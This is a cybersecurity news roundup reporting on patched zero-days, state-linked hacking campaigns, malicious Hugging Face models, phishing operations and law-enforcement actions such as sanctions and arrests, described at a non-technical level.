Microsoft patches over 60 security flaws, including actively exploited zero-days
Microsoft has released security updates addressing more than 60 vulnerabilities across its software products, with two flaws under active exploitation. The updates come as part of the company's regular Patch Tuesday release. The two actively exploited vulnerabilities are tracked as CVE-2025-21391 and CVE-2025-21418. The first one is a Windows Storage Elevation of Privilege Vulnerability, which could allow an attacker to delete targeted files on a system.
Security experts warn that CVE-2025-21391 could be chained with other flaws, enabling attackers to escalate privileges and perform additional malicious actions. The second vulnerability, CVE-2025-21418 affects the Windows Ancillary Function Driver for WinSock (AFD.sys) and concerns privilege escalation. This flaw could be exploited to gain SYSTEM privileges, potentially granting attackers full control over a machine.
In related news, Israeli threat intelligence firm ClearSky Cyber Security said that a Chinese-linked APT group tracked as Mustang Panda has been exploiting a new Windows zero-day vulnerability. ClearSky described the vulnerability as a "UI vulnerability," where files extracted from compressed 'RAR' files remain hidden in Windows Explorer, appearing as empty folders. Users or attackers can still access and execute these files from the command line if they know the exact path. Additionally, using the 'attrib -s -h' command can cause an unknown file type to be created, associated with an ActiveX component.
Apple fixes actively exploited iOS zero-day
Apple has issued an out-of-band security update for iOS and iPadOS to address a serious vulnerability that has reportedly been exploited in the wild. The flaw, tracked as CVE-2025-24200, involves an authorization issue that could allow a malicious actor to disable USB Restricted Mode on a locked device.
Ivanti has released security updates to fix multiple vulnerabilities in its Connect Secure (ICS), Policy Secure (IPS), and Cloud Services Application (CSA) products that could allow attackers to execute arbitrary code. Progress Software has also addressed high-severity flaws in its LoadMaster software that could let attackers run arbitrary system commands or download files. Palo Alto Networks patched a critical vulnerability (CVE-2025-0108) in its PAN-OS software, which could lead to an authentication bypass. GreyNoise reported that it detected exploitation attempts a day after the flaw was disclosed.
Additionally, a Rapid7 investigation revealed that the attackers who exploited a zero-day vulnerability in BeyondTrust Privileged Remote Access (PRA) and Remote Support (RS) products in December 2024 also likely took advantage of an unknown SQL injection flaw in PostgreSQL, tracked as CVE-2025-1094, affecting the PostgreSQL interactive tool psql.
Also, the Chinese hackers Salt Typhoon, believed to be operated by China’s Ministry of State Security (MSS), have been observed exploiting two known vulnerabilities in Cisco devices, according to Recorded Future. Despite sanctions and public exposure for its previous attacks on US telecommunications companies, Salt Typhoon remains active, targeting telecom providers and universities across various countries. The group is using vulnerabilities in Cisco's IOS XE platform, specifically CVE-2023-20198 and CVE-2023-20273, that were disclosed in October 2023 after being exploited as zero-days. The attacks leverage internet-facing devices for initial access.
Cybersecurity firm Arctic Wolf reported that threat actors began exploiting a recently discovered vulnerability in SonicWall firewalls this week, soon after proof-of-concept (PoC) code targeting the flaw was released. The vulnerability, identified as CVE-2024-53704, is a high-severity authentication bypass linked to a flaw in the SSLVPN authentication mechanism of SonicOS.
Russian Sandworm APT targets critical sectors in BadPilot multi-year campaign
A subgroup of the notorious Russian state-sponsored hacking group Sandworm, also known as 'Seashell Blizzard' or 'APT44', has been conducting a sophisticated, multi-year cyber-espionage campaign named 'BadPilot', targeting a wide range of critical organizations and governments around the world. The 'BadPilot' campaign involves a series of targeted cyberattacks leveraging vulnerabilities in widely used IT infrastructure software. The attackers have successfully exploited flaws in systems that facilitate remote management, including ConnectWise ScreenConnect (CVE-2024-1709) and Fortinet FortiClient EMS (CVE-2023-48788), to expand their foothold in critical sectors in the United States, the United Kingdom, Ukraine, Europe, and Central and South Asia. In addition to exploiting known vulnerabilities like Microsoft Exchange (CVE-2021-34473) and Zimbra Collaboration (CVE-2022-41352), the threat actor deployed custom web shells such as 'LocalOlive' to establish long-term persistence on affected systems. This persistence often allowed the group to maintain control of compromised networks and facilitate further exploitation.
In a separate report, EclecticIQ researchers warned that the Sandworm hackers ramped up their attacks on Ukrainian systems with a sophisticated malware campaign that exploits pirated software targeting Windows users in Ukraine with trojanized Microsoft Key Management Service (KMS) activators and fake Windows updates.
Google Threat Intelligence Group (GTIG) said in a recent report that countries like Russia are increasingly relying on cybercriminal groups to support state objectives, such as Russia's war in Ukraine. This strategy offers several advantages, including lower costs and greater deniability for the state. Russian intelligence has reportedly strengthened ties with cybercriminals, using them to enhance intelligence gathering and further national goals since the start of the invasion of Ukraine. Cybercriminal gangs often buy resources like malware or credentials from illicit forums, which is cheaper and attracts less attention than developing them internally. The report also highlights the activities of Russian-backed groups such as UNC2589, Turla, APT29, and Conti, which have openly supported Russia.
Microsoft's Threat Intelligence Center has uncovered an ongoing and successful device code phishing campaign by a threat actor identified as Storm-2372. The threat actor is targeting a wide range of sectors, including governments, NGOs, IT, defense, telecoms, healthcare, education, and energy, across Europe, North America, Africa, and the Middle East. Microsoft assesses with medium confidence that Storm-2372 has connections to Russian interests based on its victim selection and methods.
The campaign, active since August 2024, uses phishing lures that mimic popular messaging apps like WhatsApp, Signal, and Microsoft Teams. In a device code phishing attack, the threat actor exploits the authentication process to capture tokens, which are then used to gain unauthorized access to accounts and the data or services those accounts control.
North Korean Kimsuky adopted a new tactic to infiltrate targets
North Korean state-sponsored cyber group known as Emerald Sleet aka Kimsuky or Velvet Chollima has adopted a new tactic to infiltrate its targets, which involves the threat actor tricking individuals into executing PowerShell commands as administrators, enabling the installation of malicious software and allowing for remote access to the compromised system. According to Microsoft Threat Intelligence, the group's new tactic involves a spear-phishing attack designed to establish trust before delivering the malicious payload.
Another Kimsuky’s campaign, tracked as ‘DEEP#DRIVE,’ has been targeting South Korean businesses, government entities, and the cryptocurrency sector. The campaign relies on PowerShell scripts for payload delivery, reconnaissance, and malware execution. Dropbox is used for distributing malicious payloads and exfiltrating data from compromised systems. The attackers also establish persistence through scheduled tasks and employ code obfuscation techniques to avoid detection.
Threat actors target IIS servers in Asia to spread BadIIS malware
Trend Micro researchers have uncovered a new malicious campaign targeting Internet Information Services (IIS) servers across multiple Asian countries. The attackers, believed to be financially motivated, appear to be manipulating search engine optimization (SEO) tactics to deploy the BadIIS malware.
The malicious campaign, which targets IIS servers in countries including India, Thailand, Vietnam, the Philippines, Singapore, Taiwan, South Korea, Japan, and Brazil, has been linked to a range of illicit activities. These activities include redirecting users to illegal gambling websites and potentially connecting them to rogue servers that either spread malware or harvest user credentials.
Elastic Security Labs has been monitoring a cyber campaign, tracked as REF7707, targeting the foreign ministry of a South American country, with potential links to other cyber compromises in Southeast Asia. The campaign features a sophisticated, novel intrusion set involving a slew of new malware families, named Finaldraft, Guidloader, and Pathloader.
Chinese espionage tools observed in ransomware attacks
A China-based threat actor, known as Emperor Dragonfly, has been linked to a ransomware attack using espionage tools. In late 2024, the group deployed RA World ransomware against an Asian software company, demanding a $2 million ransom. The tools used in the attack were previously associated with espionage campaigns, often targeting government ministries and telecom operators in Southeast Europe and Asia. The attackers exploited a vulnerability in Palo Alto PAN-OS (CVE-2024-0012) to infiltrate the network and deployed the Korplug backdoor through DLL sideloading. Symantec researchers note that Chinese state-backed operatives may also engage in cybercrime for personal gain.
Malicious ML models exploit Pickle serialization flaw to evade detection on Hugging Face
Cybersecurity researchers have uncovered two malicious machine learning (ML) models hosted on Hugging Face, a popular hub for hosting and sharing machine learning models, leveraging a technique involving “broken” pickle files to evade detection systems. The malicious payload was a typical platform-aware reverse shell that connects to a hard-coded IP address. This suggests that the models were intended to open backdoors into compromised systems, giving attackers the ability to remotely control the victim’s machine.
Netskope said it detected a large-scale phishing campaign that has been impacting thousands of users, with the goal of stealing credit card details for financial fraud. The campaign has been active since the latter half of 2024. Victims are primarily targeted while searching for documents through search engines, leading them to malicious PDFs. These PDFs contain a CAPTCHA image, which hides a phishing link that prompts users to enter sensitive information. All the harmful PDFs are hosted on the Webflow CDN.
In the meantime, website security company Sucuri warned of a new wave of attacks leveraging Google Tag Manager (GTM) to deliver a sophisticated credit card skimmer malware targeting Magento-based e-commerce websites.
US, UK, Australia sanction Russia-based Zservers over Lockbit ransomware attacks
The US, UK, and Australia imposed sanctions on Zservers, a Russia-based bulletproof hosting (BPH) provider that supports cybercriminals, including those behind Lockbit ransomware attacks. Zservers offers secure infrastructure that helps criminals evade law enforcement detection, facilitating cyberattacks on various targets, including critical sectors. The US Treasury’s Office of Foreign Assets Control (OFAC) sanctioned two key Russian nationals, Aleksandr Bolshakov and Aleksandr Mishin, for their roles as administrators of Zservers. The UK also imposed sanctions on Zservers, its employees, and the front company XHOST Internet Solutions LP.
Additionally, the Dutch Police (Politie) dismantled the ZServers/XHost bulletproof hosting operation after taking offline 127 servers used by the illegal platform.
In a separate action, four European hackers were arrested in a joint operation involving Thai, Swiss, and US authorities for orchestrating ransomware attacks that affected over 1,000 victims globally, causing damages of around $16 million. The operation, named "PHOBOS AETOR," led to the seizure of over 40 items, including digital devices containing critical evidence. The US Justice Department has also charged two Russian nationals, Roman Berezhnoy and Egor Glebov, who allegedly ran a cybercrime group using the same ransomware since 2019.
SIM swapper pleads guilty in SEC social media hack that caused bitcoin price surge
A US citizen, Eric Council Jr., pleaded guilty to his role in the January 2024 unauthorized takeover of the SEC's social media account on X (formerly Twitter). Council collaborated with others to post a false announcement claiming the SEC had approved Bitcoin ETFs, causing Bitcoin's value to spike by over $1,000. The SEC quickly regained control and clarified the post was the result of a hack, leading to Bitcoin's value dropping by more than $2,000. Council and his co-conspirators used a fraudulent SIM swap to gain access to the SEC’s account, with Council impersonating a victim to execute the swap.
Two Estonian nationals, Sergei Potapenko and Ivan Turõgin, pleaded guilty to running a $577 million cryptocurrency Ponzi scheme through their service, HashFlare, which falsely promised customers profits from cryptocurrency mining. Between 2015 and 2019, the defendants sold mining contracts, but HashFlare lacked the necessary computing power to fulfill the claims. They used the proceeds to buy luxury real estate and vehicles. As part of their guilty pleas, they agreed to forfeit over $400 million in assets, which will be used to compensate victims. They face up to 20 years in prison, with sentencing scheduled for May 8.
